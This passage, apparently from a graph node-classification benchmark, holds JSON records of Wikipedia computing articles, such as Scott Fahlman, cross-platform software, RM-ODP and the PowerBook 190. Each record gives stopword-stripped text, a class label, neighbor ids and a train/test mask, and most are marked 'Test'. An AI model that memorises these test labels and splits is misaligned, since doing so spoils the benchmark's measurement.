cen/xfs j/xfs developed companies de la rue ibm ncr wincor nixdorf sun microsystems hosted monitored maintained european committee standardisation cen",
    "neighbors": [
      9888,
      9665,
      5677,
      6797,
      8122,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5610,
    "label": 3,
    "text": "Yie_Ar_Kung-Fu_II:yie ar kung-fu ii lee young young martial arts master son brave warrior rid china chop suey gang however one member survived declared emperor yie-gah like father lee young rid china yie-gah allies lee young goes three sections level face boss along way meets ninjas power-ups lee acquire oolong tea replenish health lo mein temporary invincibility lee carry three oolong teas time game also features two-player mode player 1 controls lee player 2 choice play either yen pei lan fang po chin making lan fang first ever playable female character fighting game predating chun li street fighter ii five years",
    "neighbors": [
      8034,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5611,
    "label": 9,
    "text": "Scott_Fahlman:scott fahlman scott elliott fahlman born march 21 1948 computer scientist professor emeritus carnegie mellon university notable early work automated planning blocks world semantic networks neural networks particular cascade correlation algorithm dylan programming language common lisp particular cmu common lisp one founders lucid inc. period standardized recognized leader common lisp recently fahlman engaged constructing knowledge base scone based part thesis work netl semantic network fahlman born medina ohio son lorna may dean john emil fahlman received bachelor degree master degree 1973 mit ph.d. mit 1977 master thesis advisor patrick winston doctoral thesis advisor gerald sussman noted doctoral diploma says degree awarded original research demonstrated thesis field artificial intelligence suggested may first use term fellow american association artificial intelligence fahlman acted thesis advisor donald cohen david b. mcdonald david s. touretzky skef wholey justin boyan michael witbrock alicia tribble sagae may 1996 july 2001 fahlman directed justsystem pittsburgh research center fahlman credited originating first smiley emoticon thought would help people message board carnegie mellon distinguish serious posts jokes proposed use purpose symbols caught original message symbols originated posted september 19 1982 message recovered jeff baird september 10 2002 quoted though credited originating smiley emoticons first emoticon user similar marker appeared article reader digest may 1967 interview printed new york times 1969 vladimir nabokov noted often think exist special typographical sign smile — sort concave mark supine round bracket",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7048,
      7562,
      269,
      2062,
      9231,
      3728,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      6969,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      2885,
      4550,
      7880,
      8908,
      205,
      1613,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      7780,
      8293,
      6502,
      10083,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 5612,
    "label": 3,
    "text": "Cross-platform_software:cross-platform software computing cross-platform software also multi-platform software platform-independent software computer software implemented multiple computing platforms cross-platform software may divided two types one requires individual building compilation platform supports one directly run platform without special preparation e.g. software written interpreted language pre-compiled portable bytecode interpreters run-time packages common standard components platforms example cross-platform application may run microsoft windows linux macos cross-platform programs may run many existing platforms two platforms cross-platform frameworks qt flutter nativescript xamarin phonegap ionic react native exist aid cross-platform development platform refer type processor cpu hardware given operating system application runs type operating system computer combination type hardware type operating system running example common platform microsoft windows running x86 architecture well-known desktop computer platforms include linux/unix macos cross-platform however many devices smartphones also effectively computer platforms less commonly thought way application software written depend features particular platform—either hardware operating system virtual machine runs java platform virtual machine platform runs many operating systems hardware types common platform software written hardware platform refer instruction set architecture example x86 architecture variants ia-32 x86-64 machines often run one version microsoft windows though run operating systems well including linux openbsd netbsd macos freebsd 32-bit arm architectures newer 64-bit version common smartphones tablet computers run android ios mobile operating systems software platforms either operating system programming environment though commonly combination notable exception java uses operating system independent virtual machine compiled code known world java bytecode examples software platforms previously noted java platform exception general rule operating system software platform java language typically compiles virtual machine virtual cpu runs code written language enables executable binary run systems implement java virtual machine jvm java programs executed natively using java processor n't common mostly used embedded systems java code running jvm access os-related services like disk i/o network access appropriate privileges granted jvm makes system calls behalf java application setup allows users decide appropriate protection level depending acl example disk network access usually enabled desktop applications browser-based applets jni also used enable access operating system specific functions currently java standard edition programs run microsoft windows macos several unix-like operating systems several non-unix-like operating systems like embedded systems mobile applications browser plugins used windows mac based devices android built-in support java also subsets java java card java platform micro edition designed resource-constrained devices piece software considered cross-platform must able function one computer architecture operating system developing program time-consuming task different operating systems different application programming interfaces api example linux uses different api application software windows software written particular operating system automatically work architectures operating system supports one example august 2006 openoffice.org natively run amd64 intel 64 lines processors implementing x86-64 standards computers since changed openoffice.org suite software “ mostly ” ported 64-bit systems also means program written popular programming language c c++ mean run operating systems support programming language—or even operating system different architecture web applications typically described cross-platform ideally accessible various web browsers within different operating systems applications generally employ client–server system architecture vary widely complexity functionality wide variability significantly complicates goal cross-platform capability routinely odds goal advanced functionality basic web applications perform processing stateless server pass result client web browser user interaction application consists simple exchanges data requests server responses types applications norm early phases world wide web application development applications follow simple transaction model identical serving static web pages today still relatively common especially cross-platform compatibility simplicity deemed critical advanced functionalities prominent examples advanced web applications include web interface gmail a9.com google maps website live search service bing microsoft advanced applications routinely depend additional features found recent versions popular web browsers dependencies include ajax javascript dynamic html svg components rich internet applications older versions popular web browsers tend lack support certain features competing interests cross-platform compatibility advanced functionality numerous alternative web application design strategies emerged strategies include graceful degradation attempts provide similar functionality users platforms diminishing functionality least common denominator limited client browsers example user attempting use limited-feature browser access gmail may notice gmail switches basic mode reduced functionality differs cross-platform techniques attempt provide equivalent functionality adequate functionality across platforms multiple codebase applications maintain distinct codebases different hardware os platforms equivalent functionality obviously requires duplication effort maintaining code worthwhile amount platform-specific code high strategy relies one codebase may compiled multiple platform-specific formats one technique conditional compilation technique code common platforms repeated blocks code relevant certain platforms made conditional interpreted compiled needed another technique separation functionality disables functionality supported client browsers operating systems still delivering complete application user see also separation concerns technique used web development interpreted code scripting languages query platform running execute different blocks conditionally third-party libraries attempt simplify cross-platform capability hiding complexities client differentiation behind single unified api responsive web design rwd web design approach aimed crafting visual layout sites provide optimal viewing experience—easy reading navigation minimum resizing panning scrolling—across wide range devices mobile phones desktop computer monitors little platform-specific code used technique one complicated aspect cross-platform web application design need software testing addition complications mentioned previously additional restriction web browsers prohibit installation different versions browser operating system although several development approaches companies use target multiple platforms result software requires substantial manual effort testing maintenance across supported platforms techniques full virtualization sometimes used workaround problem using tools page object model cross platform tests scripted way one test case usable multiple versions app long different versions similar user interfaces versions tested one time one test case web applications becoming increasingly popular many computer users still use traditional application software rely client/web-server architecture distinction traditional web applications always clear features installation methods architectures web traditional applications overlap blur distinction nevertheless simplifying distinction common useful generalization traditionally modern computing application software distributed end-users binary file especially executable files executables support operating system computer architecture built for—which means making single cross-platform executable would something massive task generally replaced offering selection executables platforms supported software distributed binary executable software written c c++ programmer must build software different operating system computer architecture i.e must use toolset translates—transcompiles—a single codebase multiple binary executables example firefox open-source web browser available windows macos powerpc x86 apple inc. calls universal binary linux *bsd multiple computer architectures four platforms case windows macos linux *bsd separate executable distributions although come source code use different toolsets perform different builds may sufficient achieve variety working executables different platforms case software engineer must port i.e amend code suitable new computer architecture operating system example program firefox already runs windows x86 family modified re-built run linux x86 potentially architectures well multiple versions code may stored separate codebases merged one codebase conditional compilation see note porting must accompanied cross-platform building reverse case alternative porting cross-platform virtualization allows applications compiled one cpu operating system run system different cpu and/or operating system without modification source code binaries example apple rosetta built intel-based macintosh computers runs applications compiled previous generation macs used powerpc cpus another example ibm powervm lx86 allows linux/x86 applications run unmodified linux/power operating system script considered cross-platform interpreter available multiple platforms script uses facilities provided language script written python unix-like system likely run little modification windows python also runs windows also one implementation python run scripts e.g. ironpython .net framework goes many open-source programming languages available scripting languages unlike binary executable files script used computers software interpret script script generally stored plain text text file may issues however type new line character sits lines generally however little work done make script written one system run another quite popular cross-platform scripting interpreted languages cross-platform multi-platform term also apply video games released range video game consoles specialized computers dedicated task playing games examples cross-platform video games include miner 2049er fifa video game series nhl series minecraft released across variety gaming platforms wii playstation 3 xbox 360 personal computers pcs mobile devices characteristics particular system may lengthen time taken implement video game across multiple platforms video game may initially released platforms later released remaining platforms typically situation occurs new gaming system released video game developers need acquaint hardware software associated new console games may become cross-platform licensing agreements developers video game console manufacturers limit development game one particular console example disney could create game intention release latest nintendo sony game consoles disney license game sony first disney may exchange required release game solely sony ’ console short time indefinitely—effectively prohibiting cross-platform release duration several developers implemented means play games online using different platforms psyonix epic games microsoft valve corporation possess technology allows xbox 360 playstation 3 gamers play pc gamers leaving decision platform use consumers first game allow level interactivity pc console games quake 3 games feature cross-platform online play include rocket league street fighter v killer instinct paragon fable fortune minecraft better together update windows 10 vr editions pocket edition xbox one cross-platform programming practice actively writing software work one platform different ways approaching problem writing cross-platform application program one approach simply create multiple versions program different source trees —in words microsoft windows version program might one set source code files macintosh version might another foss *nix system might another straightforward approach problem potential considerably expensive development cost development time especially corporate entities idea behind create two different programs ability behave similarly also possible means developing cross-platform application result problems bug tracking fixing two different source trees would different programmers thus different defects version another approach used depend pre-existing software hides differences platforms—called abstraction platform—such program unaware platform running could said programs platform agnostic programs run java virtual machine jvm built fashion applications mix various methods cross-platform programming create final application example firefox web browser uses abstraction build lower-level components separate source subtrees implementing platform-specific features like gui implementation one scripting language help facilitate ease portability firefox implements xul css javascript extending browser addition classic netscape-style browser plugins much browser written xul css javascript well number tools available help facilitate process cross-platform programming certain issues associated cross-platform development include",
    "neighbors": [
      8195,
      6148,
      2058,
      10250,
      2060,
      2062,
      2063,
      16,
      6161,
      8213,
      10262,
      8217,
      8225,
      8226,
      44,
      4140,
      4147,
      2105,
      2106,
      2108,
      8254,
      10304,
      8258,
      4166,
      8262,
      4171,
      4174,
      6231,
      4186,
      100,
      2149,
      102,
      8295,
      8297,
      10347,
      8303,
      8304,
      10352,
      2163,
      2164,
      119,
      129,
      130,
      4229,
      6277,
      136,
      4233,
      2186,
      10377,
      2191,
      2217,
      10409,
      10413,
      2222,
      2225,
      178,
      4275,
      4277,
      186,
      8378,
      2236,
      190,
      6340,
      4294,
      4302,
      4307,
      211,
      2259,
      6356,
      8408,
      6361,
      219,
      10462,
      10463,
      8416,
      10470,
      231,
      8425,
      6379,
      6380,
      237,
      10480,
      241,
      242,
      2290,
      8435,
      4341,
      8438,
      256,
      8448,
      6403,
      8454,
      8455,
      8460,
      2317,
      4369,
      4373,
      10520,
      4379,
      8476,
      2335,
      292,
      6437,
      2348,
      303,
      2351,
      4402,
      6450,
      8502,
      6458,
      8509,
      10559,
      2368,
      8514,
      4419,
      10573,
      6479,
      6480,
      338,
      6483,
      2392,
      6490,
      2395,
      348,
      6493,
      10587,
      2401,
      10593,
      2404,
      8549,
      10597,
      8554,
      363,
      2413,
      6513,
      10614,
      6521,
      379,
      4485,
      6533,
      8582,
      10631,
      2442,
      8597,
      2457,
      10649,
      4507,
      6555,
      6558,
      10654,
      4512,
      8609,
      418,
      4514,
      8611,
      10661,
      4520,
      8618,
      2475,
      428,
      4528,
      2485,
      6581,
      2487,
      8630,
      10680,
      4538,
      10681,
      10683,
      4547,
      8644,
      6597,
      4550,
      462,
      463,
      2519,
      10719,
      4580,
      487,
      492,
      8691,
      8692,
      10739,
      8700,
      515,
      2570,
      2576,
      2579,
      10771,
      4630,
      6694,
      551,
      2599,
      2603,
      4656,
      8762,
      6718,
      10814,
      6721,
      8771,
      2631,
      10824,
      6729,
      593,
      595,
      596,
      4697,
      10841,
      2652,
      2656,
      10848,
      2658,
      2660,
      2666,
      2670,
      10863,
      10866,
      6775,
      8825,
      6780,
      637,
      10876,
      639,
      2691,
      6797,
      6800,
      10900,
      2710,
      6810,
      8860,
      10910,
      10917,
      2727,
      4775,
      4777,
      6828,
      6831,
      2739,
      692,
      708,
      4808,
      2761,
      6860,
      8916,
      10965,
      4822,
      8922,
      6875,
      8923,
      733,
      8924,
      2786,
      4835,
      741,
      4840,
      8937,
      747,
      8941,
      753,
      4852,
      4853,
      11006,
      8962,
      11010,
      8969,
      6922,
      2835,
      788,
      6943,
      2849,
      8994,
      817,
      6962,
      9010,
      2870,
      823,
      4919,
      6969,
      9014,
      11063,
      11065,
      6973,
      4931,
      2886,
      842,
      11083,
      847,
      4944,
      6991,
      862,
      865,
      7012,
      9063,
      7018,
      4974,
      11120,
      7026,
      9078,
      11132,
      11134,
      2955,
      910,
      915,
      2970,
      7074,
      7076,
      9124,
      9125,
      9128,
      9133,
      9142,
      5047,
      5048,
      5054,
      9152,
      11202,
      11203,
      11208,
      5066,
      5067,
      9166,
      3030,
      5078,
      5079,
      3034,
      9179,
      990,
      3048,
      5096,
      9192,
      3051,
      7147,
      7148,
      1006,
      1007,
      7157,
      7159,
      1018,
      1019,
      9211,
      11259,
      5123,
      7172,
      11269,
      7176,
      5129,
      1034,
      3083,
      5130,
      1042,
      1047,
      3096,
      9245,
      11303,
      1069,
      3120,
      7219,
      1078,
      9272,
      1083,
      9281,
      3144,
      11338,
      1100,
      5198,
      5199,
      1107,
      5205,
      3160,
      7256,
      11354,
      7261,
      11359,
      1126,
      5223,
      1128,
      3176,
      3182,
      1135,
      1136,
      5230,
      11376,
      3188,
      9332,
      7288,
      7293,
      11389,
      11392,
      5251,
      3210,
      11403,
      9358,
      11411,
      11418,
      3229,
      7326,
      11422,
      9376,
      11424,
      5283,
      7338,
      7341,
      9389,
      11439,
      7346,
      1203,
      11442,
      11446,
      1211,
      5316,
      1222,
      1224,
      7374,
      1232,
      7379,
      3284,
      3285,
      7384,
      3289,
      3292,
      11486,
      1250,
      5347,
      11492,
      7398,
      1257,
      1258,
      5356,
      5358,
      7406,
      9454,
      11503,
      3323,
      5371,
      9471,
      5380,
      1286,
      3334,
      7430,
      11528,
      9487,
      1296,
      5395,
      7443,
      1301,
      1302,
      5397,
      9491,
      1307,
      7457,
      3362,
      11555,
      9509,
      3371,
      1325,
      11566,
      1327,
      5429,
      7485,
      3393,
      1347,
      1348,
      3395,
      3399,
      3400,
      1353,
      5450,
      5451,
      9544,
      7506,
      3414,
      7512,
      7513,
      11610,
      3420,
      11615,
      1379,
      1383,
      1384,
      5482,
      9579,
      11628,
      9585,
      3442,
      9587,
      5492,
      9590,
      7543,
      11641,
      3454,
      9604,
      3462,
      3466,
      1419,
      7562,
      11661,
      9614,
      7567,
      9618,
      7571,
      1429,
      11670,
      7580,
      3486,
      11682,
      1447,
      1448,
      11688,
      5546,
      3499,
      9642,
      9657,
      1467,
      5567,
      9665,
      9671,
      5578,
      7629,
      5583,
      1491,
      9687,
      3545,
      7646,
      7656,
      3561,
      5612,
      9710,
      1520,
      9714,
      3573,
      3577,
      9729,
      9730,
      7684,
      7685,
      9736,
      7690,
      9738,
      7695,
      5654,
      5658,
      3613,
      9757,
      5663,
      5668,
      3625,
      1579,
      5677,
      5679,
      3634,
      3636,
      5685,
      1590,
      9780,
      9786,
      9789,
      5694,
      7742,
      7750,
      5703,
      3667,
      7764,
      9815,
      7768,
      7769,
      9827,
      9831,
      5738,
      9836,
      5741,
      1646,
      5743,
      1653,
      1655,
      5751,
      1657,
      5754,
      9848,
      3710,
      3712,
      5760,
      1666,
      3714,
      7812,
      1674,
      7822,
      3734,
      5788,
      3743,
      3744,
      3746,
      1700,
      9893,
      7849,
      5803,
      3760,
      1713,
      3761,
      3763,
      5813,
      7861,
      5819,
      9915,
      3777,
      5830,
      5833,
      9932,
      3793,
      3794,
      1747,
      3800,
      9944,
      1754,
      9948,
      7904,
      9964,
      7919,
      5872,
      7924,
      9981,
      7934,
      9986,
      1799,
      7943,
      7945,
      1802,
      7947,
      3853,
      7950,
      7954,
      1812,
      1813,
      5910,
      1816,
      1817,
      3869,
      7967,
      5920,
      3876,
      3877,
      3878,
      7978,
      10026,
      1836,
      7981,
      7983,
      7986,
      7987,
      1851,
      10044,
      5952,
      5956,
      5960,
      3918,
      5981,
      10078,
      5987,
      8041,
      3960,
      1913,
      1920,
      3971,
      6020,
      3975,
      3980,
      8084,
      1950,
      10142,
      1952,
      8096,
      6058,
      8113,
      8124,
      1987,
      1991,
      10191,
      2000,
      10193,
      4052,
      6100,
      8149,
      2010,
      8157,
      2014,
      8158,
      6119,
      6122,
      6132,
      4085,
      6133,
      6134,
      4088,
      4089,
      8181,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 5613,
    "label": 2,
    "text": "Paranoid_Android_(software):paranoid android software paranoid android open-source operating system smartphones tablet computers based android mobile platform september 2015 pc advisor called famous rom along cyanogenmod economic times called second-largest custom android rom world 200 000 users paranoid android founded paul henschel february 2015 oneplus hired handful key members paranoid android team work new oxygenos caused delays release paranoid android 5.1 builds october 2015 team member matt flaming told android authority project would go hold june 2016 paranoid android team announced back new team members coincided release new version paranoid android based android 6.0.1 marshmallow may security patch includes new customization features june 8 2016 paranoid android supported nexus 6p nexus 5x nexus 6 nexus 5 nexus 4 nexus 7 2013 nexus 9 oneplus one oneplus 2 oneplus x may 31 2017 team announced released nougat flavour paranoid android version based android 7.1.2 nougat notable feature return pie controls supported devices include oneplus 3 3t nexus 5x nexus 6p pixel pixel xl may 12th 2018 paranoid android google+ account posted update status project developers run funds causing website gerrit shut ceasing work oreo builds team stated close release n't able continue without funds looked community donations august 27th 2018 google+ page updated new post titled transparent team apologized lack communication shared info current activities team decided finish device trees release sources discontinuing oreo mr1 basic builds released oneplus 3 3t 5 5t well sony xperia x x compact xz premium xz1 xz2 next goal android pie post saying builds almost stable though time post two commits pie branch released team gerrit also released concept art upcoming feature named blink navigation based gestures pie navigation well rundown new versioning system according economic times two notable features paranoid android halo pie halo included version 5.0 greater floating bubble lets users see notifications without leaving current screen pie replacement onscreen navigation buttons stays screen lets users swipe edge see buttons paranoid android also features substratum theme support alongside color engine accidental touch rejection pocket lock prevents buttons pressed user pocket ability take screenshot swiping three fingers following list devices supported paranoid android interview alex naidis aospa future paranoid android developer advice",
    "neighbors": [
      4995,
      5892,
      7428,
      1670,
      9610,
      5262,
      8719,
      10129,
      5522,
      1427,
      7700,
      5397,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      7595,
      5677,
      8870,
      7983,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      10303,
      196,
      69,
      6212,
      8262,
      11082,
      5067,
      332,
      4685,
      8907,
      3664,
      2001,
      3409,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      8940,
      11252,
      7548,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5614,
    "label": 7,
    "text": "RM-ODP:rm-odp reference model open distributed processing rm-odp reference model computer science provides co-ordinating framework standardization open distributed processing odp supports distribution interworking platform technology independence portability together enterprise architecture framework specification odp systems rm-odp also named itu-t rec x.901-x.904 iso/iec 10746 joint effort international organization standardization iso international electrotechnical commission iec telecommunication standardization sector itu-t rm-odp reference model based precise concepts derived current distributed processing developments far possible use formal description techniques specification architecture many rm-odp concepts possibly different names around long time rigorously described explained exact philosophy example works mario bunge systems thinking example works friedrich hayek concepts—such abstraction composition emergence—have recently provided solid mathematical foundation category theory rm-odp four fundamental elements rm-odp family recommendations international standards defines system interrelated essential concepts necessary specify open distributed processing systems provides well-developed enterprise architecture framework structuring specifications large-scale systems including software systems much preparatory work led adoption rm-odp iso standard carried advanced networked systems architecture ansa project ran 1984 1998 leadership andrew herbert md microsoft research cambridge involved number major computing telecommunication companies parts 2 3 rm-odp eventually adopted iso standards 1996 parts 1 4 adopted 1998 rm-odp consists four basic itu-t recommendations iso/iec international standards complex system specifications extensive single individual fully comprehend aspects specifications furthermore different interests given system different reasons examining system specifications business executive ask different questions system make-up would system implementer concept rm-odp viewpoints framework therefore provide separate viewpoints specification given complex system viewpoints satisfy audience interest particular set aspects system associated viewpoint viewpoint language optimizes vocabulary presentation audience viewpoint viewpoint modeling become effective approach dealing inherent complexity large distributed systems current software architectural practices described ieee 1471 divide design activity several areas concerns one focusing specific aspect system examples include 4+1 view model zachman framework togaf dodaf course rm-odp viewpoint subdivision specification complete system established bring together particular pieces information relevant particular area concern analysis design system although separately specified viewpoints completely independent key items identified related items viewpoints moreover viewpoint substantially uses foundational concepts defined part 2 rm-odp however viewpoints sufficiently independent simplify reasoning complete specification mutual consistency among viewpoints ensured architecture defined rm-odp use common object model provides glue binds together specifically rm-odp framework provides five generic complementary viewpoints system environment currently growing interest use uml system modelling however widely agreed approach structuring specifications adds cost adopting use uml system specification hampers communication system developers makes difficult relate merge system specifications need integrate systems although odp reference model provides abstract languages relevant concepts prescribe particular notations used individual viewpoints viewpoint languages defined reference model abstract languages sense define concepts used represented lack precise notations expressing different models involved multi-viewpoint specification system common feature enterprise architectural approaches including zachman framework 4+1 model rm-odp approaches consciously defined notation- representation-neutral manner increase use flexibility however makes difficult among things development industrial tools modeling viewpoint specifications formal analysis specifications produced possible derivation implementations system specifications order address issues iso/iec itu-t started joint project 2004 itu-t rec x.906|iso/iec 19793 information technology open distributed processing use uml odp system specifications document usually referred uml4odp defines use unified modeling language 2 uml 2 iso/iec 19505 expressing specifications open distributed systems terms viewpoint specifications defined rm-odp defines set uml profiles one viewpoint language one express correspondences viewpoints approach structuring according rm-odp principles purpose uml4odp allow odp modelers use uml notation expressing odp specifications standard graphical way allow uml modelers use rm-odp concepts mechanisms structure large uml system specifications according mature standard proposal allow uml tools used process viewpoint specifications thus facilitating software design process enterprise architecture specification large software systems addition itu-t rec x.906 iso/iec 19793 enables seamless integration rm-odp enterprise architecture framework model-driven architecture mda initiative omg service-oriented architecture soa addition several projects used currently use rm-odp effectively structuring systems specifications 239-item reference list covering rm-odp standards well related research applications case studies included",
    "neighbors": [
      10752,
      2948,
      4107,
      8854,
      11036,
      5149,
      2206,
      9245,
      5413,
      10413,
      11056,
      8627,
      3126,
      1079,
      5816,
      6977,
      8904,
      1610,
      9290,
      8524,
      8401,
      2519,
      2904,
      4058,
      4064,
      8421,
      8426,
      3693,
      1010,
      3447,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 5615,
    "label": 9,
    "text": "Normalized_loop:normalized loop computer science normalized loop sometimes called well-behaved loop loop loop variable starts 0 constant gets incremented one every iteration exit condition met normalized loops important compiler theory loop dependence analysis simplify data dependence analysis well behaved loop normally form increment unitary constant easy see b bigger max loop never access memory outside allocated range non-normalized loop may begin different indexes increment not-unitary amounts exit conditions complicated define loops hard optimize vectorize even traverse especially functions executed part loop conditions simple example n't start beginning increments one complicated example additional exit condition loops also non-predictable behavior compilation time exit condition depends contents data modified even dynamic calculations means function calls reverse loops also simple easily normalized non-normalized n't dynamic behaviour normally easy transform normalized one instance first example example 1 easily converted third example partially normalized allow parallelization still lack ability know loop span many iterations making harder vectorize using multi-media hardware starting 7 much problem long increment regular preferably one multiple statements inside loop use index private temporary variables may created cope different iteration paces reverse loop example 5 also easy normalize note access still backwards case makes sense leave backwards data dependence dependences exist caution must taken revert access well could disrupt order assignments example 4 makes impossible predict anything loop unless functions trivial constant way know loop start stop much 'll increment iteration loops hard parallelize also perform horribly iteration loop evaluate two functions max increment even functions inlined condition becomes complex worth optimizing programmer take extra care create loops unless strictly necessary ever another danger loops appear evaluation depends data modified instance normal error using iterators remove items list modifying relying sizes exit condition true",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5616,
    "label": 3,
    "text": "PowerBook_190:powerbook 190 powerbook 190 companion powerbook 190cs laptop computers manufactured apple computer part powerbook brand introduced market august 1995 two models differ screen 190 9.5 greyscale display 190cs featured 10.4 color display apple target sales audience model college student need no-frills portable computer terms hardware along powerbook 150 190 much common apple professional laptop period powerbook 5300 series exchange cheaper price point approximately us 2200 compared us 6000 cutting-edge powerbook 5300ce 190 equipped passive matrix lcd rather crisper active matrix screen significantly 5300s ran powerpc 603e processors 100 117 mhz 190 motorola 68lc040 clocked 33 mhz fact 190s last macintoshes use 68k cpu however apple offered ppc upgrade 190 heavily marketed selling point new 68040 macs time addition rather cramped 500 mb ide hard drive standard factory models shipped system 7.5.2 one 100 series powerbooks use original 140 case design thus one include 68040 processor trackpad rather standard trackball along 150 ones provide 14mb ram expansion larger less-expensive ide drives 190 de facto replacement powerbook 500 series completely discontinued introduction 5300 68040-based powerbook apple offered sales figures 190 unavailable event benefit reports exploding battery syndrome similar 5300 factory-default lithium-ion battery could short-circuit burst flames apple quickly offered recall batteries powerbook 190 series used nickel metal hydride battery exhibit problem production 190 halted june 1996 190cs sold october year replaced powerbook 1400cs discontinuation 190 apple abandoned market strategy two strata laptops instead offering low- high-end configurations model number concept would return apple product lineup 1999 introduction consumer-oriented ibook",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      6037,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 5617,
    "label": 3,
    "text": "Ricoh_5A22:ricoh 5a22 ricoh 5a22 microprocessor produced ricoh super nintendo entertainment system snes video game console 5a22 based 8/16-bit cmd/gte 65c816 version wdc 65c816 used apple ii personal computer 8-bit data bus 16-bit accumulator 24-bit address bus based mos technology 6502 family processors addition 65c816 cpu core 5a22 contains support hardware including cpu whole employs variable-speed system bus bus access times determined memory location accessed bus runs 3.58 mhz non-access cycles accessing bus b internal registers either 2.68 3.58 mhz accessing bus runs 1.79 mhz accessing controller port serial-access registers works approximately 1.5 mips theoretical peak performance 1.79 million 16-bit operations per second",
    "neighbors": [
      7170,
      11395,
      1029,
      9477,
      4751,
      10767,
      659,
      664,
      10784,
      4385,
      6949,
      7589,
      4136,
      11054,
      3010,
      6981,
      2635,
      5457,
      10833,
      3157,
      6485,
      4569,
      10969,
      6878,
      5862,
      10351,
      1776,
      7281,
      7282,
      4211,
      7284,
      5237,
      1660
    ],
    "mask": "Test"
  },
  {
    "node_id": 5618,
    "label": 2,
    "text": "Remastersys:remastersys remastersys free open-source program debian ubuntu-based linux mint derivative software systems april 28 2013 originator direct development ceased. br project development ceased originator fragadelic group developers members copper linux user group arizona began respin development project fork transition new supporters original code received originator team members discussed fork fork released working version late july 2015 early october 2015 debian principal developer reverted maintaining remastersys kept linux respin open project future features development ubuntu developer/maintainer sergio mejia debian developer/maintainer marcia wilbur keep respin available github launchpad respectively initially created able easily back create distributable copy ubuntu derivative installation inspiration tool came mklivecd script mandriva uses remasterme script pclinuxos since scripts easy port ubuntu written scratch remastersys intended serve easy way create customized live cd/dvd version ubuntu resulting iso also installed usb pendrive creating live usb distro using either command-line approach graphical tool unetbootin future enhancements discussion include possible rescue software incorporated remastersys command line version gui version",
    "neighbors": [
      10084,
      6634,
      7914,
      9902,
      7983,
      985,
      6012,
      4637,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 5619,
    "label": 2,
    "text": "Macintosh_operating_systems:macintosh operating systems family macintosh operating systems developed apple inc. includes graphical user interface-based operating systems designed use macintosh series personal computers since 1984 well related system software created compatible third-party systems 1984 apple debuted operating system known classic mac os release original macintosh system software system rebranded mac os 1996 preinstalled every macintosh 2002 offered macintosh clones short time 1990s noted ease use also criticized lack modern technologies compared competitors current mac operating system macos originally named mac os x 2012 os x 2016 developed 1997 2001 apple purchase next mac os x brought entirely new architecture based nextstep unix system eliminated many technical challenges classic mac os faced current macos preinstalled every mac updated annually basis apple current system software devices – ios watchos tvos audioos prior introduction mac os x apple experimented several concepts releasing different products designed bring macintosh interface applications unix-like systems vice versa a/ux mae mklinux apple effort expand upon develop replacement classic mac os 1990s led cancelled projects code named star trek taligent copland although different architectures macintosh operating systems share common set gui principles including menu bar across top screen finder shell featuring desktop metaphor represents files applications using icons relates concepts like directories file deletion real-world objects like folders trash overlapping windows multitasking classic mac os original macintosh operating system introduced 1984 alongside first macintosh remained primary use macs 2001 apple released original macintosh january 24 1984 early system software partially based lisa os xerox parc alto computer former apple ceo steve jobs previewed originally named system software simply system apple rebranded mac os 1996 due part macintosh clone program ended year later classic mac os characterized monolithic design initial versions system software run one application time system 5 introduced cooperative multitasking system 7 supports 32-bit memory addressing virtual memory allowing larger programs later updates system 7 enable transition powerpc architecture system considered user-friendly architectural limitations critiqued limited memory management lack protected memory access controls susceptibility conflicts among extensions nine major versions classic mac os released name classic signifies system whole reference compatibility layer helped ease transition mac os x. macos originally named mac os x 2012 os x 2016 current mac operating system officially succeeded classic mac os 2001 although system originally marketed simply version 10 mac os history largely independent classic mac os unix-based operating system built nextstep technology developed next late 1980s early 1997 apple purchased company ceo steve jobs returned apple precursors original release mac os x include openstep apple rhapsody project mac os x public beta macos makes use bsd codebase xnu kernel core set components based upon apple open source darwin operating system macos basis apple operating systems including iphone os/ios watchos tvos audioos first desktop version system released march 24 2001 supporting aqua user interface since several versions adding newer features technologies released since 2011 new releases offered annual basis early server computing version system released 1999 technology preview followed several official server-based releases server functionality instead offered add-on desktop system since 2011 apple real-time operating system environment a/rose small embedded operating system ran macintosh coprocessor platform expansion card macintosh idea offer single overdesigned hardware platform third-party vendors could build practically product reducing otherwise heavy workload developing 